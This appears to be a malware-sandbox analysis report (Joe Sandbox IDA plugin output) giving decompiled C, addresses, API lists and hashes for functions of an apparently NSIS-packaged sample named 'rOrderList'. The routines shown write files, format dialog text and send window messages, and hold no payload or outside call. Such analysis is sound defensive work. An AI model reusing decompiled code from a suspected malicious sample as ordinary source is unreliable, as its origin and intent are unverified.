                                                                                      • Opcode ID: 3624e717fbcf7ea6fd8cb3bfca044f62ca72f15282bbc00cb62a71a2cd90e3ed
                                                                                      • Instruction ID: 618675c633d4cc4fa353176bd059bfe03840d53555a4d718e50652829a5d94b1
                                                                                      • Opcode Fuzzy Hash: 3624e717fbcf7ea6fd8cb3bfca044f62ca72f15282bbc00cb62a71a2cd90e3ed
                                                                                      • Instruction Fuzzy Hash: 4CF01D7050020EABDF206F60DE4ABEA3B78EB00349F00803AFA15A51D0DBBD9559DB59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 93%
                                                                                      			E00402947(void* __ebx, void* __eflags) {
                                                                                      				void* _t26;
                                                                                      				long _t31;
                                                                                      				void* _t45;
                                                                                      				void* _t49;
                                                                                      				void* _t51;
                                                                                      				void* _t54;
                                                                                      				void* _t55;
                                                                                      				void* _t56;
                                                                                      
                                                                                      				_t45 = __ebx;
                                                                                      				 *((intOrPtr*)(_t56 - 0x38)) = 0xfffffd66;
                                                                                      				_t50 = E00402D3E(0xfffffff0);
                                                                                      				 *(_t56 - 0x40) = _t23;
                                                                                      				if(E00405E88(_t50) == 0) {
                                                                                      					E00402D3E(0xffffffed);
                                                                                      				}
                                                                                      				E0040600D(_t50);
                                                                                      				_t26 = E00406032(_t50, 0x40000000, 2);
                                                                                      				 *(_t56 + 8) = _t26;
                                                                                      				if(_t26 != 0xffffffff) {
                                                                                      					_t31 =  *0x42a278;
                                                                                      					 *(_t56 - 0x44) = _t31;
                                                                                      					_t49 = GlobalAlloc(0x40, _t31);
                                                                                      					if(_t49 != _t45) {
                                                                                      						E00403590(_t45);
                                                                                      						E0040357A(_t49,  *(_t56 - 0x44));
                                                                                      						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x28));
                                                                                      						 *(_t56 - 0x10) = _t54;
                                                                                      						if(_t54 != _t45) {
                                                                                      							E00403309(_t47,  *((intOrPtr*)(_t56 - 0x2c)), _t45, _t54,  *(_t56 - 0x28));
                                                                                      							while( *_t54 != _t45) {
                                                                                      								_t47 =  *_t54;
                                                                                      								_t55 = _t54 + 8;
                                                                                      								 *(_t56 - 0x3c) =  *_t54;
                                                                                      								E00405FED( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
                                                                                      								_t54 = _t55 +  *(_t56 - 0x3c);
                                                                                      							}
                                                                                      							GlobalFree( *(_t56 - 0x10));
                                                                                      						}
                                                                                      						E004060E4( *(_t56 + 8), _t49,  *(_t56 - 0x44));
                                                                                      						GlobalFree(_t49);
                                                                                      						 *((intOrPtr*)(_t56 - 0x38)) = E00403309(_t47, 0xffffffff,  *(_t56 + 8), _t45, _t45);
                                                                                      					}
                                                                                      					CloseHandle( *(_t56 + 8));
                                                                                      				}
                                                                                      				_t51 = 0xfffffff3;
                                                                                      				if( *((intOrPtr*)(_t56 - 0x38)) < _t45) {
                                                                                      					_t51 = 0xffffffef;
                                                                                      					DeleteFileW( *(_t56 - 0x40));
                                                                                      					 *((intOrPtr*)(_t56 - 4)) = 1;
                                                                                      				}
                                                                                      				_push(_t51);
                                                                                      				E00401423();
                                                                                      				 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t56 - 4));
                                                                                      				return 0;
                                                                                      			}











                                                                                      0x00402947
                                                                                      0x00402949
                                                                                      0x00402955
                                                                                      0x00402958
                                                                                      0x00402962
                                                                                      0x00402966
                                                                                      0x00402966
                                                                                      0x0040296c
                                                                                      0x00402979
                                                                                      0x00402981
                                                                                      0x00402984
                                                                                      0x0040298a
                                                                                      0x00402998
                                                                                      0x0040299d
                                                                                      0x004029a1
                                                                                      0x004029a4
                                                                                      0x004029ad
                                                                                      0x004029b9
                                                                                      0x004029bd
                                                                                      0x004029c0
                                                                                      0x004029ca
                                                                                      0x004029e9
                                                                                      0x004029d1
                                                                                      0x004029d6
                                                                                      0x004029de
                                                                                      0x004029e1
                                                                                      0x004029e6
                                                                                      0x004029e6
                                                                                      0x004029f0
                                                                                      0x004029f0
                                                                                      0x004029fd
                                                                                      0x00402a03
                                                                                      0x00402a15
                                                                                      0x00402a15
                                                                                      0x00402a1b
                                                                                      0x00402a1b
                                                                                      0x00402a26
                                                                                      0x00402a27
                                                                                      0x00402a2b
                                                                                      0x00402a2f
                                                                                      0x00402a35
                                                                                      0x00402a35
                                                                                      0x00402a3c
                                                                                      0x004022e9
                                                                                      0x00402bc5
                                                                                      0x00402bd1

                                                                                      APIs
                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 0040299B
                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029B7
                                                                                      • GlobalFree.KERNEL32(?), ref: 004029F0
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00402A03
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402A1B
                                                                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402A2F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                      • String ID:
                                                                                      • API String ID: 2667972263-0
                                                                                      • Opcode ID: d96938230be506bb3ce62f46d8dc11094feca3525b7110c1e5131bc4c1b7a030
                                                                                      • Instruction ID: 7dc8c05146b407601171e0863837a653734e4b001a2a5e69b47689ac9694c0d9
                                                                                      • Opcode Fuzzy Hash: d96938230be506bb3ce62f46d8dc11094feca3525b7110c1e5131bc4c1b7a030
                                                                                      • Instruction Fuzzy Hash: 3121C171C00124BBDF216FA5DE49D9E7E79AF04364F10023AF964762E1CB794D419BA8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 77%
                                                                                      			E00404D3F(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                                                      				char _v68;
                                                                                      				char _v132;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				signed int _t23;
                                                                                      				signed int _t24;
                                                                                      				void* _t31;
                                                                                      				void* _t33;
                                                                                      				void* _t34;
                                                                                      				void* _t44;
                                                                                      				signed int _t46;
                                                                                      				signed int _t50;
                                                                                      				signed int _t52;
                                                                                      				signed int _t53;
                                                                                      				signed int _t55;
                                                                                      
                                                                                      				_t23 = _a16;
                                                                                      				_t53 = _a12;
                                                                                      				_t44 = 0xffffffdc;
                                                                                      				if(_t23 == 0) {
                                                                                      					_push(0x14);
                                                                                      					_pop(0);
                                                                                      					_t24 = _t53;
                                                                                      					if(_t53 < 0x100000) {
                                                                                      						_push(0xa);
                                                                                      						_pop(0);
                                                                                      						_t44 = 0xffffffdd;
                                                                                      					}
                                                                                      					if(_t53 < 0x400) {
                                                                                      						_t44 = 0xffffffde;
                                                                                      					}
                                                                                      					if(_t53 < 0xffff3333) {
                                                                                      						_t52 = 0x14;
                                                                                      						asm("cdq");
                                                                                      						_t24 = 1 / _t52 + _t53;
                                                                                      					}
                                                                                      					_t25 = _t24 & 0x00ffffff;
                                                                                      					_t55 = _t24 >> 0;
                                                                                      					_t46 = 0xa;
                                                                                      					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                                                                                      				} else {
                                                                                      					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                                                                                      					_t50 = 0;
                                                                                      				}
                                                                                      				_t31 = E00406579(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                                                                                      				_t33 = E00406579(_t44, _t50, _t55,  &_v132, _t44);
                                                                                      				_t34 = E00406579(_t44, _t50, 0x423748, 0x423748, _a8);
                                                                                      				wsprintfW(_t34 + lstrlenW(0x423748) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                                                                                      				return SetDlgItemTextW( *0x429238, _a4, 0x423748);
                                                                                      			}



















                                                                                      0x00404d48
                                                                                      0x00404d4d
                                                                                      0x00404d55
                                                                                      0x00404d56
                                                                                      0x00404d63
                                                                                      0x00404d6b
                                                                                      0x00404d6c
                                                                                      0x00404d6e
                                                                                      0x00404d70
                                                                                      0x00404d72
                                                                                      0x00404d75
                                                                                      0x00404d75
                                                                                      0x00404d7c
                                                                                      0x00404d82
                                                                                      0x00404d82
                                                                                      0x00404d89
                                                                                      0x00404d90
                                                                                      0x00404d93
                                                                                      0x00404d96
                                                                                      0x00404d96
                                                                                      0x00404d9a
                                                                                      0x00404daa
                                                                                      0x00404dac
                                                                                      0x00404daf
                                                                                      0x00404d58
                                                                                      0x00404d58
                                                                                      0x00404d5f
                                                                                      0x00404d5f
                                                                                      0x00404db7
                                                                                      0x00404dc2
                                                                                      0x00404dd8
                                                                                      0x00404de9
                                                                                      0x00404e05

                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE0
                                                                                      • wsprintfW.USER32 ref: 00404DE9
                                                                                      • SetDlgItemTextW.USER32(?,00423748), ref: 00404DFC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                      • String ID: %u.%u%s%s$H7B
                                                                                      • API String ID: 3540041739-107966168
                                                                                      • Opcode ID: 81e6bb5195e7400279b778c86ac6a8681d5ba99035ba1ad4c9ee4d48c62e75c7
                                                                                      • Instruction ID: 1eef4f6c404c38b42470a280790990b5f635bff36f5ff3debe150acb3f73a003
                                                                                      • Opcode Fuzzy Hash: 81e6bb5195e7400279b778c86ac6a8681d5ba99035ba1ad4c9ee4d48c62e75c7
                                                                                      • Instruction Fuzzy Hash: 59110873A0412837DB0065ADAC45EDE32989F81374F250237FE26F20D5EA78CD1182E8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 77%
                                                                                      			E00401D81(void* __ebx, void* __edx) {
                                                                                      				struct HWND__* _t30;
                                                                                      				WCHAR* _t38;
                                                                                      				void* _t48;
                                                                                      				void* _t53;
                                                                                      				signed int _t55;
                                                                                      				signed int _t60;
                                                                                      				long _t63;
                                                                                      				void* _t65;
                                                                                      
                                                                                      				_t53 = __ebx;
                                                                                      				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
                                                                                      					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
                                                                                      				} else {
                                                                                      					E00402D1C(2);
                                                                                      					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
                                                                                      				}
                                                                                      				_t55 =  *(_t65 - 0x24);
                                                                                      				 *(_t65 + 8) = _t30;
                                                                                      				_t60 = _t55 & 0x00000004;
                                                                                      				 *(_t65 - 0x38) = _t55 & 0x00000003;
                                                                                      				 *(_t65 - 0x18) = _t55 >> 0x1f;
                                                                                      				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
                                                                                      				if((_t55 & 0x00010000) == 0) {
                                                                                      					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
                                                                                      				} else {
                                                                                      					_t38 = E00402D3E(0x11);
                                                                                      				}
                                                                                      				 *(_t65 - 0x44) = _t38;
                                                                                      				GetClientRect( *(_t65 + 8), _t65 - 0x60);
                                                                                      				asm("sbb esi, esi");
                                                                                      				_t63 = LoadImageW( ~_t60 &  *0x42a260,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
                                                                                      				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
                                                                                      				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
                                                                                      					DeleteObject(_t48);
                                                                                      				}
                                                                                      				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
                                                                                      					_push(_t63);
                                                                                      					E00406483();
                                                                                      				}
                                                                                      				 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t65 - 4));
                                                                                      				return 0;
                                                                                      			}











                                                                                      0x00401d81
                                                                                      0x00401d85
                                                                                      0x00401d9a
                                                                                      0x00401d87
                                                                                      0x00401d89
                                                                                      0x00401d8f
                                                                                      0x00401d8f
                                                                                      0x00401da0
                                                                                      0x00401da3
                                                                                      0x00401dad
                                                                                      0x00401db0
                                                                                      0x00401db8
                                                                                      0x00401dc9
                                                                                      0x00401dcc
                                                                                      0x00401dd7
                                                                                      0x00401dce
                                                                                      0x00401dd0
                                                                                      0x00401dd0
                                                                                      0x00401ddb
                                                                                      0x00401de5
                                                                                      0x00401e0c
                                                                                      0x00401e1b
                                                                                      0x00401e29
                                                                                      0x00401e31
                                                                                      0x00401e39
                                                                                      0x00401e39
                                                                                      0x00401e42
                                                                                      0x00401e48
                                                                                      0x00402b08
                                                                                      0x00402b08
                                                                                      0x00402bc5
                                                                                      0x00402bd1

                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                                                      • GetClientRect.USER32(?,?), ref: 00401DE5
                                                                                      • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                                                      • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                                                      • DeleteObject.GDI32(00000000), ref: 00401E39
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                      • String ID:
                                                                                      • API String ID: 1849352358-0
                                                                                      • Opcode ID: 657c18a0f69634810084f7808af5fab3a58a396e011c15f602512883127771f4
                                                                                      • Instruction ID: def1b01f8fd4f78887aa18ea50614605241407c0d84dd339e733dcfbebc98a92
                                                                                      • Opcode Fuzzy Hash: 657c18a0f69634810084f7808af5fab3a58a396e011c15f602512883127771f4
                                                                                      • Instruction Fuzzy Hash: 06212672A04119AFCB05CFA4DE45AEEBBB5EF08304F14403AF945F62A0C7389D51DB98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 59%
                                                                                      			E00401C43(intOrPtr __edx) {
                                                                                      				int _t29;
                                                                                      				long _t30;
                                                                                      				signed int _t32;
                                                                                      				WCHAR* _t35;
                                                                                      				long _t36;
                                                                                      				int _t41;
                                                                                      				signed int _t42;
                                                                                      				int _t46;
                                                                                      				int _t56;
                                                                                      				intOrPtr _t57;
                                                                                      				struct HWND__* _t63;
                                                                                      				void* _t64;
                                                                                      
                                                                                      				_t57 = __edx;
                                                                                      				_t29 = E00402D1C(3);
                                                                                      				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                      				 *(_t64 - 0x18) = _t29;
                                                                                      				_t30 = E00402D1C(4);
                                                                                      				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                      				 *(_t64 + 8) = _t30;
                                                                                      				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
                                                                                      					 *((intOrPtr*)(__ebp - 0x18)) = E00402D3E(0x33);
                                                                                      				}
                                                                                      				__eflags =  *(_t64 - 0x1c) & 0x00000002;
                                                                                      				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
                                                                                      					 *(_t64 + 8) = E00402D3E(0x44);
                                                                                      				}
                                                                                      				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
                                                                                      				_push(1);
                                                                                      				if(__eflags != 0) {
                                                                                      					_t61 = E00402D3E();
                                                                                      					_t32 = E00402D3E();
                                                                                      					asm("sbb ecx, ecx");
                                                                                      					asm("sbb eax, eax");
                                                                                      					_t35 =  ~( *_t31) & _t61;
                                                                                      					__eflags = _t35;
                                                                                      					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                                                                      					goto L10;
                                                                                      				} else {
                                                                                      					_t63 = E00402D1C();
                                                                                      					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                      					_t41 = E00402D1C(2);
                                                                                      					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                      					_t56 =  *(_t64 - 0x1c) >> 2;
                                                                                      					if(__eflags == 0) {
                                                                                      						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
                                                                                      						L10:
                                                                                      						 *(_t64 - 0x38) = _t36;
                                                                                      					} else {
                                                                                      						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
                                                                                      						asm("sbb eax, eax");
                                                                                      						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                                                      					}
                                                                                      				}
                                                                                      				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
                                                                                      				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
                                                                                      					_push( *(_t64 - 0x38));
                                                                                      					E00406483();
                                                                                      				}
                                                                                      				 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t64 - 4));
                                                                                      				return 0;
                                                                                      			}















                                                                                      0x00401c43
                                                                                      0x00401c45
                                                                                      0x00401c4c
                                                                                      0x00401c4f
                                                                                      0x00401c52
                                                                                      0x00401c5c
                                                                                      0x00401c60
                                                                                      0x00401c63
                                                                                      0x00401c6c
                                                                                      0x00401c6c
                                                                                      0x00401c6f
                                                                                      0x00401c73
                                                                                      0x00401c7c
                                                                                      0x00401c7c
                                                                                      0x00401c7f
                                                                                      0x00401c83
                                                                                      0x00401c85
                                                                                      0x00401cda
                                                                                      0x00401cdc
                                                                                      0x00401ce7
                                                                                      0x00401cf1
                                                                                      0x00401cf4
                                                                                      0x00401cf4
                                                                                      0x00401cfd
                                                                                      0x00000000
                                                                                      0x00401c87
                                                                                      0x00401c8e
                                                                                      0x00401c90
                                                                                      0x00401c93
                                                                                      0x00401c99
                                                                                      0x00401ca0
                                                                                      0x00401ca3
                                                                                      0x00401ccb
                                                                                      0x00401d03
                                                                                      0x00401d03
                                                                                      0x00401ca5
                                                                                      0x00401cb3
                                                                                      0x00401cbb
                                                                                      0x00401cbe
                                                                                      0x00401cbe
                                                                                      0x00401ca3
                                                                                      0x00401d06
                                                                                      0x00401d09
                                                                                      0x00401d0f
                                                                                      0x00402b08
                                                                                      0x00402b08
                                                                                      0x00402bc5
                                                                                      0x00402bd1

                                                                                      APIs
                                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Timeout
                                                                                      • String ID: !
                                                                                      • API String ID: 1777923405-2657877971
                                                                                      • Opcode ID: faab02cff34b921551a1342022214cf29e3e194daab0830cb346dd63cd78f0b5
                                                                                      • Instruction ID: 504b766b7349ebce22e5cc184c1b69e4e3709f4fc648736089561923f5a7a9d8
                                                                                      • Opcode Fuzzy Hash: faab02cff34b921551a1342022214cf29e3e194daab0830cb346dd63cd78f0b5
                                                                                      • Instruction Fuzzy Hash: C221AD7195420AAEEF05AFB4D94AAAE7BB0EF44304F10453EF601B61D1D7B84941CB98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 53%
                                                                                      			E00405F19(void* __eflags, intOrPtr _a4) {
                                                                                      				int _t11;
                                                                                      				signed char* _t12;
                                                                                      				intOrPtr _t18;
                                                                                      				intOrPtr* _t21;
                                                                                      				signed int _t23;
                                                                                      
                                                                                      				E0040653C(0x425f50, _a4);
                                                                                      				_t21 = E00405EBC(0x425f50);
                                                                                      				if(_t21 != 0) {
                                                                                      					E004067EB(_t21);
                                                                                      					if(( *0x42a27c & 0x00000080) == 0) {
                                                                                      						L5:
                                                                                      						_t23 = _t21 - 0x425f50 >> 1;
                                                                                      						while(1) {
                                                                                      							_t11 = lstrlenW(0x425f50);
                                                                                      							_push(0x425f50);
                                                                                      							if(_t11 <= _t23) {
                                                                                      								break;
                                                                                      							}
                                                                                      							_t12 = E0040689A();
                                                                                      							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                                                      								E00405E5D(0x425f50);
                                                                                      								continue;
                                                                                      							} else {
                                                                                      								goto L1;
                                                                                      							}
                                                                                      						}
                                                                                      						E00405E11();
                                                                                      						return 0 | GetFileAttributesW(??) != 0xffffffff;
                                                                                      					}
                                                                                      					_t18 =  *_t21;
                                                                                      					if(_t18 == 0 || _t18 == 0x5c) {
                                                                                      						goto L1;
                                                                                      					} else {
                                                                                      						goto L5;
                                                                                      					}
                                                                                      				}
                                                                                      				L1:
                                                                                      				return 0;
                                                                                      			}








                                                                                      0x00405f25
                                                                                      0x00405f30
                                                                                      0x00405f34
                                                                                      0x00405f3b
                                                                                      0x00405f47
                                                                                      0x00405f57
                                                                                      0x00405f59
                                                                                      0x00405f71
                                                                                      0x00405f72
                                                                                      0x00405f79
                                                                                      0x00405f7a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405f5d
                                                                                      0x00405f64
                                                                                      0x00405f6c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405f64
                                                                                      0x00405f7c
                                                                                      0x00000000
                                                                                      0x00405f90
                                                                                      0x00405f49
                                                                                      0x00405f4f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405f4f
                                                                                      0x00405f36
                                                                                      0x00000000

                                                                                      APIs
                                                                                        • Part of subcall function 0040653C: lstrcpynW.KERNEL32(?,?,00000400,004036A9,00429260,NSIS Error,?,00000007,00000009,0000000B), ref: 00406549
                                                                                        • Part of subcall function 00405EBC: CharNextW.USER32(?,?,00425F50,?,00405F30,00425F50,00425F50, 4%w.%w,?,77252EE0,00405C6E,?,77253420,77252EE0,00000000), ref: 00405ECA
                                                                                        • Part of subcall function 00405EBC: CharNextW.USER32(00000000), ref: 00405ECF
                                                                                        • Part of subcall function 00405EBC: CharNextW.USER32(00000000), ref: 00405EE7
                                                                                      • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50, 4%w.%w,?,77252EE0,00405C6E,?,77253420,77252EE0,00000000), ref: 00405F72
                                                                                      • GetFileAttributesW.KERNEL32(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50, 4%w.%w,?,77252EE0,00405C6E,?,77253420,77252EE0), ref: 00405F82
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
